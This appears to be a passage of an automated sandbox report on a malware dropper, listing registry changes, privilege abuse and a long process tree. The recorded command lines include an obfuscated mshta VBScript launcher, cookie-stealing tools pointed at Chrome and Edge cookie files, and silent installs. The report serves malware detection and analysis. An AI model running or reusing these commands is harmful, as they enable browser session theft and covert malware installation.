| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob | C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (31).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3149759.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\ZyGUs27gecV6eAGW7VJZ0w9C.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\uHOiH_2iL26qxgcHVqyiIsgk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\7312180.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B972.tmp\chfTpfsIhk2k8cljoC8x4lEy.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OMSLM.tmp\Inlog.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VBCFN.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L1S5H.tmp\VPN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (31).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (31).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv AQ4ciwWch0+5spMnjZvMow.0.2
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\Documents\83BotY7zekRTK847HrWIewXZ.exe
"C:\Users\Admin\Documents\83BotY7zekRTK847HrWIewXZ.exe"
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
"C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe"
C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe
"C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe"
C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe
"C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe"
C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe
"C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe"
C:\Users\Admin\Documents\ZyGUs27gecV6eAGW7VJZ0w9C.exe
"C:\Users\Admin\Documents\ZyGUs27gecV6eAGW7VJZ0w9C.exe"
C:\Users\Admin\Documents\DgwUCSUm2EGoDKzrKphU5yue.exe
"C:\Users\Admin\Documents\DgwUCSUm2EGoDKzrKphU5yue.exe"
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
"C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe"
C:\Users\Admin\Documents\6bHi9nzObsq3d4KNm11c6Eml.exe
"C:\Users\Admin\Documents\6bHi9nzObsq3d4KNm11c6Eml.exe"
C:\Users\Admin\Documents\uHOiH_2iL26qxgcHVqyiIsgk.exe
"C:\Users\Admin\Documents\uHOiH_2iL26qxgcHVqyiIsgk.exe"
C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe
"C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe"
C:\Users\Admin\Documents\yMYgDoN5ZlPFh65_uPIocVpq.exe
"C:\Users\Admin\Documents\yMYgDoN5ZlPFh65_uPIocVpq.exe"
C:\Users\Admin\Documents\chfTpfsIhk2k8cljoC8x4lEy.exe
"C:\Users\Admin\Documents\chfTpfsIhk2k8cljoC8x4lEy.exe"
C:\Users\Admin\AppData\Local\Temp\is-8B972.tmp\chfTpfsIhk2k8cljoC8x4lEy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8B972.tmp\chfTpfsIhk2k8cljoC8x4lEy.tmp" /SL5="$18001E,138429,56832,C:\Users\Admin\Documents\chfTpfsIhk2k8cljoC8x4lEy.exe"
C:\Users\Admin\Documents\L8WRQMlpeAVDYBe1g8EXl7az.exe
"C:\Users\Admin\Documents\L8WRQMlpeAVDYBe1g8EXl7az.exe"
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\AppData\Roaming\7312180.exe
"C:\Users\Admin\AppData\Roaming\7312180.exe"
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\Documents\PMUOXlkoMDg8DAIz4tJrckfK.exe
"C:\Users\Admin\Documents\PMUOXlkoMDg8DAIz4tJrckfK.exe"
C:\Users\Admin\Documents\eKqSKHZZ2JFiGVSyFjfDNb1j.exe
"C:\Users\Admin\Documents\eKqSKHZZ2JFiGVSyFjfDNb1j.exe"
C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe
"C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe"
C:\Users\Admin\AppData\Roaming\4529314.exe
"C:\Users\Admin\AppData\Roaming\4529314.exe"
C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe
"C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2956 -ip 2956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 292
C:\Users\Admin\AppData\Roaming\4817824.exe
"C:\Users\Admin\AppData\Roaming\4817824.exe"
C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe
"C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe"
C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe
"C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe"
C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe
"C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe"
C:\Users\Admin\Documents\r3sUVpG8YzDn117UsLb5R5OU.exe
"C:\Users\Admin\Documents\r3sUVpG8YzDn117UsLb5R5OU.exe"
C:\Users\Admin\Documents\MqvI8Cq4rKJpl1rZaYA3UHxb.exe
"C:\Users\Admin\Documents\MqvI8Cq4rKJpl1rZaYA3UHxb.exe"
C:\Users\Admin\Documents\lcuipBJpFrvOQm_Mceqsl0ox.exe
"C:\Users\Admin\Documents\lcuipBJpFrvOQm_Mceqsl0ox.exe"
C:\Users\Admin\Documents\QLXqt3I4VSrifZucS_spgEli.exe
"C:\Users\Admin\Documents\QLXqt3I4VSrifZucS_spgEli.exe"
C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe
"C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe"
C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe
"C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe"
C:\Users\Admin\Documents\9dY8lwHbaM85prcqOGGjFq3O.exe
"C:\Users\Admin\Documents\9dY8lwHbaM85prcqOGGjFq3O.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2568 -ip 2568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3120 -ip 3120
C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe
"C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe"
C:\Users\Admin\AppData\Roaming\6075649.exe
"C:\Users\Admin\AppData\Roaming\6075649.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5064 -ip 5064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 316
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4380 -ip 4380
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 288
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe" /Verysilent
C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe
C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1420 -ip 1420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 3900 -ip 3900
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 3244 -ip 3244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe
"C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe" -q
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 280
C:\Users\Admin\AppData\Local\Temp\is-OMSLM.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OMSLM.tmp\Inlog.tmp" /SL5="$10360,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "E6TRgkpLt1N0zENcY_UZeYQx.exe"
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Users\Admin\AppData\Local\Temp\is-VBCFN.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VBCFN.tmp\WEATHER Manager.tmp" /SL5="$10374,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-L1S5H.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L1S5H.tmp\VPN.tmp" /SL5="$10394,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-MA26D.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MA26D.tmp\MediaBurner2.tmp" /SL5="$502D2,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4432 -ip 4432
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5152 -ip 5152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 296
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-2P5HR.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-2P5HR.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\8637498.exe
"C:\Users\Admin\AppData\Roaming\8637498.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5796 -ip 5796
C:\Users\Admin\AppData\Roaming\3149759.exe
"C:\Users\Admin\AppData\Roaming\3149759.exe"
C:\Users\Admin\AppData\Roaming\5741268.exe
"C:\Users\Admin\AppData\Roaming\5741268.exe"
C:\Users\Admin\AppData\Roaming\7276330.exe
"C:\Users\Admin\AppData\Roaming\7276330.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Roaming\4990795.exe
"C:\Users\Admin\AppData\Roaming\4990795.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4080 -ip 4080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 700
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 748 -p 3252 -ip 3252
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 460
C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\AppData\Local\Temp\tmp8CCB_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp8CCB_tmp.exe"
C:\Users\Admin\Documents\OdQEgGNiZoEXpervDLKTtxOi.exe
"C:\Users\Admin\Documents\OdQEgGNiZoEXpervDLKTtxOi.exe"
C:\Users\Admin\Documents\CuW5mjlgfninmMpfxqzHkv_b.exe
"C:\Users\Admin\Documents\CuW5mjlgfninmMpfxqzHkv_b.exe"
C:\Users\Admin\Documents\PiE5dvUDUWLiIromDReLQD7J.exe
"C:\Users\Admin\Documents\PiE5dvUDUWLiIromDReLQD7J.exe"
C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe
"C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe"
C:\Users\Admin\Documents\c02Q0jtD5yxTWwElGoZLhUed.exe
"C:\Users\Admin\Documents\c02Q0jtD5yxTWwElGoZLhUed.exe"
C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe
"C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe"
C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe
"C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe"
C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe
"C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe"
C:\Users\Admin\Documents\kAhUZJb43nELoVFUTwdqKsZm.exe
"C:\Users\Admin\Documents\kAhUZJb43nELoVFUTwdqKsZm.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\Documents\J1sdQgiASQhk1d_yHnJFHovt.exe
"C:\Users\Admin\Documents\J1sdQgiASQhk1d_yHnJFHovt.exe"
C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe
"C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe"
C:\Users\Admin\Documents\dDP4tjpUeEPe3kHHUjVTbGns.exe
"C:\Users\Admin\Documents\dDP4tjpUeEPe3kHHUjVTbGns.exe"
C:\Users\Admin\Documents\ORctmFkRK26vcfEGBnHO2f5Q.exe
"C:\Users\Admin\Documents\ORctmFkRK26vcfEGBnHO2f5Q.exe"
C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe
"C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe"
C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe
"C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3252 -s 2320
C:\Users\Admin\Documents\sf1Cbiw4pTyZX67Gtp7X6pbZ.exe
"C:\Users\Admin\Documents\sf1Cbiw4pTyZX67Gtp7X6pbZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5204 -ip 5204
C:\Users\Admin\AppData\Local\Temp\is-8TCMR.tmp\sf1Cbiw4pTyZX67Gtp7X6pbZ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8TCMR.tmp\sf1Cbiw4pTyZX67Gtp7X6pbZ.tmp" /SL5="$2023C,138429,56832,C:\Users\Admin\Documents\sf1Cbiw4pTyZX67Gtp7X6pbZ.exe"
C:\Users\Admin\AppData\Local\Temp\is-MRSMD.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MRSMD.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 1920
C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe
C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\is-A8619.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A8619.tmp\Setup.tmp" /SL5="$204AA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-MRSMD.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe
C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe
C:\Users\Admin\AppData\Local\Temp\E849.exe
C:\Users\Admin\AppData\Local\Temp\E849.exe
C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe
"C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1856 -ip 1856
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
